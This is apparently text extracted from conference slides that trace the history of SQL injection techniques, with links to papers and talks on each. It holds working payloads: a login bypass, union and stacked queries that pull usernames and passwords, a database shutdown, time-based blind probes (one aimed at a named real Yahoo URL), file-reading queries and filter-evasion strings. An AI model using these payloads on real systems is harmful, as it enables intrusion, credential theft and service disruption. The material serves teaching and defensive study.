http://www.phrack.org/issues.html?id=8&issue=54
Beginning
Tautology
admin
or 1=1
http://www.docstoc.com/docs/39896830/IBM-Rational-ClearQuest-Web-Login-Bypass-SQL-Injection-Vulnerability
Place
Inband
-1 union select 1,1,1,1,username,1,a,1 from users --
2001 - OutBand
http://www.blackhat.com/presentations/bh-asia-01/litchfield/litchfield.doc
https://sparrow.ece.cmu.edu/group/731-s11/readings/anley-sql-inj.pdf
Advanced Tricks
Username: '; begin declare @ret varchar(8000) set @ret=':' select
@ret=@ret+' '+username+'/'+password from users where username>@ret
select @ret as ret into foo end--
Id= 1; shutdown --
27 Mar - 2007
Outer Bands
DNS Queries
FTP Sites
SMB Files
Remote DB
Web Files
Log Files
Eyes of Fear
2002 - Blind
http://server/miphp.php?id=1 and 1=1
True
http://server/miphp.php?id=1 and 1=0
False
2010 US Army
Time
http://www.northernfortress.net/more_advanced_sql_injection.pdf
ping -n 10 127.0.0.1
if (ascii(substring(@s, @byte, 1)) & ( power(2, @bit))) > 0 waitfor delay '0:0:5'
http://www.elladodelmal.com/2007/06/blind-sql-injection-ii-de-hackeando-un.html
http://tw.ysm.emarketing.yahoo.com/soeasy/index.php?p=2&scId=113; select SLEEP(5)--
http://www.elladodelmal.com/2013/04/time-based-blind-sql-injection-en-yahoo.html
https://www.defcon.org/images/defcon-16/dc16-presentations/alonso-parada/defcon-16-alonso-parada-wp.pdf
True
False
http://labs.portcullis.co.uk/application/deep-blind-sql-injection
Ace
union select '1','2','3',(select * from sysusers for xml raw, binary base64)
pass=
Id=A+(1/(ASCII(B)-C))
Id=A+ASCII(B)-C
Id=A+((C/ASCII(B))*(K))
LoadFile
SELECT LOAD_FILE(0x633A5C626F6F742E696E69)
DBMS_LOB
; execute immediate
DECLARE l_bfile BFILE;
l_blob BLOB;
BEGIN INSERT INTO A737D141 (datos) VALUES (EMPTY_BLOB()) RETURN datos INTO
l_blob;
l_bfile := BFILENAME(''A4A9308C'', ''Picture.bmp'');
DBMS_LOB.fileopen(l_bfile, Dbms_Lob.File_Readonly);
DBMS_LOB.loadfromfile(l_blob,l_bfile,DBMS_LOB.getlength(l_bfile));
DBMS_LOB.fileclose(l_bfile);
COMMIT;
EXCEPTION
WHEN OTHERS THEN ROLLBACK;
END;
; end; --
CSRF+SQLi
Smuggling
/**/aNd/**/1=aSC(substr(user(),1,1))%00
Braveness
http://www.blackhat.com/presentations/bh-dc-10/Alonso_Chema/Blackhat-DC-2010-Alonso-Connection-StringParameter-Pollution-wp.pdf
XPath Injection
http://2stop.me/S%C3%A9curit%C3%A9%20Informatique/Web/EN%20-%20Blind%20Xpath%20injection.pdf
LDAP Injection
http://www.blackhat.com/presentations/bh-europe-08/Alonso-Parada/Whitepaper/bh-eu-08-alonso-parada-WP.pdf
Forbidden
->
Python? -> Not invulnerable
.NET? -> Not invulnerable
LinQ? -> Not invulnerable
More
@chemaalonso
http://www.elladodelmal.com
http://0xword.com/libros/25-libro-hacking-aplicaciones-web-sql-injection.html